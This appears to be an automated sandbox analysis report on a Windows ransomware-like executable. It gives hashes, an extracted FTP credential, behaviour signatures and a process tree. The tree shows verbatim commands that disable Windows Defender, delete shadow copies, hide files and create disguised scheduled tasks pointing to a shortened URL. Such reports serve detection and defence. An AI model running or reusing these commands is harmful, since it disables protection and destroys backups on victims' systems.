Analysis

  • max time kernel
    1200s
  • max time network
    1199s
  • platform
    windows10-1703_x64
  • resource
    win10-20240611-en
  • resource tags
    arch:x64, arch:x86, image:win10-20240611-en, locale:en-us, os:windows10-1703-x64, system
  • submitted
    19/06/2024, 22:08

General

  • Target
    1.exe
  • Size
    275KB
  • MD5
    b61525d88761a974e57c8257c76ec999
  • SHA1
    231893b80d83f297ebdc760d4a1388afd98a4dd6
  • SHA256
    6abd97d20372a17384c5fd928ef5548da218b615247276acd7bf0a62ad3cf6e7
  • SHA512
    0ab047b99ef446056fac3f45b62c1c65fc8675c2fff938ba3c88fe600aa969b030b2d1474bece5305e40a2220fbbdaeb0584a1630fce3b53535bb9a27ee6b53c
  • SSDEEP
    6144:ITR3vnpRfE/UVPy/oCa+LDZWC9z5KIFXWBHdZ6Nba09IdkaNiTN:I3vnpRfzPygCa+DZvXWP09IGC2

Malware Config

Extracted

Credentials

  • Protocol:
    ftp
  • Host:
    ftp.encompossoftware.com
  • Port:
    21
  • Username:
    remoteuser
  • Password:
    Encomposx99

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 3 IoCs
  • Modifies security service 2 TTPs 1 IoCs
  • Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
  • Modifies visibility of hidden/system files in Explorer 2 TTPs 1 IoCs
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Executes dropped EXE 1 IoCs
  • Drops desktop.ini file(s) 3 IoCs
  • Enumerates connected drives 3 TTPs 15 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 2 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Disables Windows logging functionality 2 TTPs

    Changes registry settings to disable Windows Event logging.

  • Interacts with shadow copies 3 TTPs 12 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 53 IoCs
  • Suspicious use of SendNotifyMessage 52 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\1.exe
    "C:\Users\Admin\AppData\Local\Temp\1.exe"
    1⤵
    • Modifies Windows Defender Real-time Protection settings
    • Modifies security service
    • Drops desktop.ini file(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4268
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding" & attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • Suspicious use of WriteProcessMemory
      PID:1672
      • C:\Windows\system32\attrib.exe
        attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding"
        3⤵
        • Views/modifies file attributes
        PID:4732
      • C:\Windows\system32\attrib.exe
        attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D
        3⤵
        • Views/modifies file attributes
        PID:4180
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" Get-MpPreference -verbose
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2468
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3736
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3540
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2904
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3160
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3536
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4504
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3296
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4148
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:560
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1688
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:640
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3092
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c vssadmin Delete Shadows /all /quiet
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3604
      • C:\Windows\system32\vssadmin.exe
        vssadmin Delete Shadows /all /quiet
        3⤵
        • Interacts with shadow copies
        PID:5272
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c vssadmin resize shadow /for=c: /on=c: /maxsize=401MB
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3004
      • C:\Windows\system32\vssadmin.exe
        vssadmin resize shadow /for=c: /on=c: /maxsize=401MB
        3⤵
        PID:4480
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
      2⤵
      PID:1964
      • C:\Windows\system32\vssadmin.exe
        vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
        3⤵
        • Interacts with shadow copies
        PID:5392
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
      2⤵
      PID:4036
      • C:\Windows\system32\vssadmin.exe
        vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
        3⤵
        • Enumerates connected drives
        • Interacts with shadow copies
        PID:5292
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
      2⤵
      PID:3088
      • C:\Windows\system32\vssadmin.exe
        vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
        3⤵
        • Enumerates connected drives
        • Interacts with shadow copies
        PID:5304
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
      2⤵
      PID:1104
      • C:\Windows\system32\vssadmin.exe
        vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
        3⤵
        • Enumerates connected drives
        • Interacts with shadow copies
        PID:5356
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
      2⤵
      PID:4776
      • C:\Windows\system32\vssadmin.exe
        vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
        3⤵
        • Enumerates connected drives
        • Interacts with shadow copies
        PID:5332
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
      2⤵
      PID:3764
      • C:\Windows\system32\vssadmin.exe
        vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
        3⤵
        • Enumerates connected drives
        • Interacts with shadow copies
        PID:5404
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2460
      • C:\Windows\system32\vssadmin.exe
        vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
        3⤵
        • Enumerates connected drives
        • Interacts with shadow copies
        PID:5204
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
      2⤵
      PID:4264
      • C:\Windows\system32\vssadmin.exe
        vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
        3⤵
        • Enumerates connected drives
        • Interacts with shadow copies
        PID:5280
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
      2⤵
      PID:4656
      • C:\Windows\system32\vssadmin.exe
        vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
        3⤵
        • Enumerates connected drives
        • Interacts with shadow copies
        PID:5348
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
      2⤵
      PID:3564
      • C:\Windows\system32\vssadmin.exe
        vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
        3⤵
        • Enumerates connected drives
        • Interacts with shadow copies
        PID:5340
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c Vssadmin delete shadowstorage /all /quiet
      2⤵
      PID:5096
      • C:\Windows\system32\vssadmin.exe
        Vssadmin delete shadowstorage /all /quiet
        3⤵
        • Interacts with shadow copies
        PID:5320
    • C:\Windows\SYSTEM32\schtasks.exe
      schtasks /create /f /st "02:39" /sc daily /mo "2" /tn "Intel TXE" /tr "'explorer'http://bit.ly/2Q7XObq"
      2⤵
      • Scheduled Task/Job: Scheduled Task
      PID:5444
    • C:\Windows\SYSTEM32\schtasks.exe
      schtasks /create /f /st "00:05" /sc daily /mo "3" /tn "Intel TXE" /tr "'explorer'http://bit.ly/2Q7XObq"
      2⤵
      • Scheduled Task/Job: Scheduled Task
      PID:5140
    • C:\Windows\SYSTEM32\schtasks.exe
      schtasks /create /f /st "20:19" /sc daily /mo "2" /tn "Intel TXE" /tr "'explorer'http://bit.ly/2Q7XObq"
      2⤵
      • Scheduled Task/Job: Scheduled Task
      PID:5664
    • C:\Windows\SYSTEM32\schtasks.exe
      schtasks /create /f /st "16:35" /sc weekly /mo "3" /d "Sat" /tn "Intel TXE" /tr "'explorer'http://bit.ly/2Q7XObq"
      2⤵
      • Scheduled Task/Job: Scheduled Task
      PID:2148
    • C:\Windows\SYSTEM32\schtasks.exe
      schtasks /create /f /st "08:34" /sc monthly /m "aug" /tn "Intel TXE" /tr "'explorer'http://bit.ly/2Q7XObq"
      2⤵
      • Scheduled Task/Job: Scheduled Task
      PID:4188
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c ping 0 -n 2 & del "C:\Users\Admin\AppData\Local\Temp\1.exe"
      2⤵
      PID:556
      • C:\Windows\system32\PING.EXE
        ping 0 -n 2
        3⤵
        • Runs ping.exe
        PID:5836
    • C:\Users\Admin\AppData\Roaming\Branding\svchost.exe
      "C:\Users\Admin\AppData\Roaming\Branding\svchost.exe"
      2⤵
      • Modifies visibility of file extensions in Explorer
      • Modifies visibility of hidden/system files in Explorer
      • Executes dropped EXE
      • Drops desktop.ini file(s)
      PID:5308
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding" & attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D
        3⤵
        • Hide Artifacts: Hidden Files and Directories
        PID:212
        • C:\Windows\system32\attrib.exe
          attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding"
          4⤵
          • Views/modifies file attributes
          PID:5300
        • C:\Windows\system32\attrib.exe
          attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D
          4⤵
          • Views/modifies file attributes
          PID:3772
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Drops file in Windows directory
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:4500
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:5608

Network

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize: 3KB
    MD5: 8592ba100a78835a6b94d5949e13dfc1
    SHA1: 63e901200ab9a57c7dd4c078d7f75dcd3b357020
    SHA256: fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
    SHA512: 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 1KB
    MD5: aceeffc4dc3ea66c804cb1c296f0ba42
    SHA1: 80e30f0547bb7c1aa00cf704cc2b2fb68bb3b914
    SHA256: 2c2f947ed23f9d7a9c5a3b8ea581034d919c2fa66d941c1c320f73c0eb0a5159
    SHA512: a4aff8b8ecbb48ea232940a154fe1bb180d80d05d8dfaca3c2c6885a589c36a2a4b5c8def7e2d3b2bc1214b93be1d158e140b3b7413db1fe1cd0bd93c9e9fd52
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 1KB
    MD5: 0ffcbed36512e6246c9b86eb2735480d
    SHA1: dee6c5ab9aa47b42f291a364d52a137c010cd8bf
    SHA256: fa3dca6c7f0185d577f214b7d5fc8616e84e10dccb466f3f4af8d8243e7cba38
    SHA512: 03e4508f558d4a53db5bec5e2192dd140795dacc2790a7915fcca3669bf7f77fb3a102d3468e03b2e4edb246533712fe6d04af6b5f88465c9c8c5ecd2f6cef02
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 1KB
    MD5: de034f7e32dc04b2279c9ef6f62bff1c
    SHA1: 1bfc256e106703c7342f630210308c02f6e2fc82
    SHA256: 29f1d37cd09bdbbf7fd3eb27774617b5a8884cdbd284ed679ad91eb388c63f6e
    SHA512: 51df10895ffe0f51b95271250a1296bce676770cb4a4c3e98e6f92df3fd1bbe8c6b4584d0bff15916be8023b2ca7d2651dbf09e649797305ba8bac633dda3ae9
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 1KB
    MD5: ab201310a00744ceb9766fb481b31adf
    SHA1: 1d577a7dd9e02787e730afd7c54648bf1b5b1fb0
    SHA256: 9f39e165eb4754fa87d86b0719ed68658e22083595fa4605637d1832ac9023ef
    SHA512: dfc3a80a1cf68cfb5dfab1db1369ed477f13aa094144ee549705e10576a17479b25653aca5b2211ad8670b62e9d4cca5052c101dadfffa90c7878f97b3da2d8b
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 1KB
    MD5: 0c71ec2aba024b1401fb514fcfd3f006
    SHA1: 16df9c3c2de9d442cccc08cab4021fe067bcac3f
    SHA256: 52371b272f4ee46e5e071ed0257dff30928b27a78ad31f6e7f3c4e6e6b1e310e
    SHA512: 1a7c2185b0d9cbbdb6b629a5af02c91b174427ed54bfa7691b681decc40cbf5bcf1c482bb762b2171ddb7bf3d729fb2919accf880fe498c38ccde4293f775709
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 1KB
    MD5: 02c2c30ae8a5f0f8d8cee3efdcfb6de7
    SHA1: 818fbe85c0230ddde80597dc99417119ccecf429
    SHA256: 75ffc42d0c35d6df353f7acc17bc00db71b82bcf09ad0b3f130c44fc2f751e45
    SHA512: 41d4cd0d4acae614cdfd65386134d7d508779c415bc0faeb3547874d715adeae4a47b8466306a091fa959899845325a1579abfe8f7d4b575e69b78e2d7ebcf46
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 1KB
    MD5: f2f3d502745bd1a4b75f1c62375862e8
    SHA1: c5908f438458925e0fd2b3ba690342c96989ffd8
    SHA256: 3e480081f788a11a70ef241206603a0439583836caaed8fed0520b95d783ebe8
    SHA512: 39a7693f9dc0c08b240202bb662e41c89a6f3d8b51e2d911698dc43f5a5f3aedd2046e63a8f636d234e8eb3dd7409ad7a4426f3f510595920f83d1d11feec601
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 1KB
    MD5: f6b31b2fbb43a1345f8c9460c37a1ac3
    SHA1: c49c9ad025cb8160d98b5cd8b3b5f69e6e62a86c
    SHA256: e0942628ca82ef4a4b45c7aeb622b37db5bc35e6277d56c98d5f29567bcd4505
    SHA512: d10f1203ba3881ef59edddf3ef49d994f86f7afd0d39a2796c9aca33bcb476915537e9d5b793113dfb7f6661edc7fc7df5c3b62b0be4115c445acf29e9f8ebe9
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 1KB
    MD5: bd38ca31bc247393e51b07d8de7f059d
    SHA1: 9c72aaba4ea96581f207e30125f2c2cbed1aa379
    SHA256: 668a2181001a3adde7a0feb23ea479ca646956282814a09445c6814080e0e283
    SHA512: 1cd2368448116b119cb364654c763fe36aa8e92f465bc6ebd504f61595365018831a4ebe8145d29548bca9fa1fd4789fd19fe7a340f05d4581de1fd9b98bd186
  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vgeeupf4.jsp.ps1
    Filesize: 1B
    MD5: c4ca4238a0b923820dcc509a6f75849b
    SHA1: 356a192b7913b04c54574d18c28d46e6395428ab
    SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
    SHA512: 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
  • C:\Users\Admin\AppData\Roaming\Branding\svchost.exe
    Filesize: 275KB
    MD5: b61525d88761a974e57c8257c76ec999
    SHA1: 231893b80d83f297ebdc760d4a1388afd98a4dd6
    SHA256: 6abd97d20372a17384c5fd928ef5548da218b615247276acd7bf0a62ad3cf6e7
    SHA512: 0ab047b99ef446056fac3f45b62c1c65fc8675c2fff938ba3c88fe600aa969b030b2d1474bece5305e40a2220fbbdaeb0584a1630fce3b53535bb9a27ee6b53c
  • memory/2468-13-0x000001E6FF920000-0x000001E6FF942000-memory.dmp
    Filesize: 136KB
  • memory/2468-16-0x000001E6FFAD0000-0x000001E6FFB46000-memory.dmp
    Filesize: 472KB
  • memory/4268-1-0x0000027FC6C20000-0x0000027FC6C6A000-memory.dmp
    Filesize: 296KB
  • memory/4268-0-0x00007FF9FC433000-0x00007FF9FC434000-memory.dmp
    Filesize: 4KB
  • memory/4268-7-0x00007FF9FC430000-0x00007FF9FCE1C000-memory.dmp
    Filesize: 9.9MB
  • memory/4268-568-0x00007FF9FC430000-0x00007FF9FCE1C000-memory.dmp
    Filesize: 9.9MB
  • memory/4268-290-0x00007FF9FC433000-0x00007FF9FC434000-memory.dmp
    Filesize: 4KB
  • memory/4268-574-0x00007FF9FC430000-0x00007FF9FCE1C000-memory.dmp
    Filesize: 9.9MB
  • memory/5308-579-0x0000024E643C0000-0x0000024E643DE000-memory.dmp
    Filesize: 120KB
  • memory/5308-580-0x0000024E00530000-0x0000024E00A56000-memory.dmp
    Filesize: 5.1MB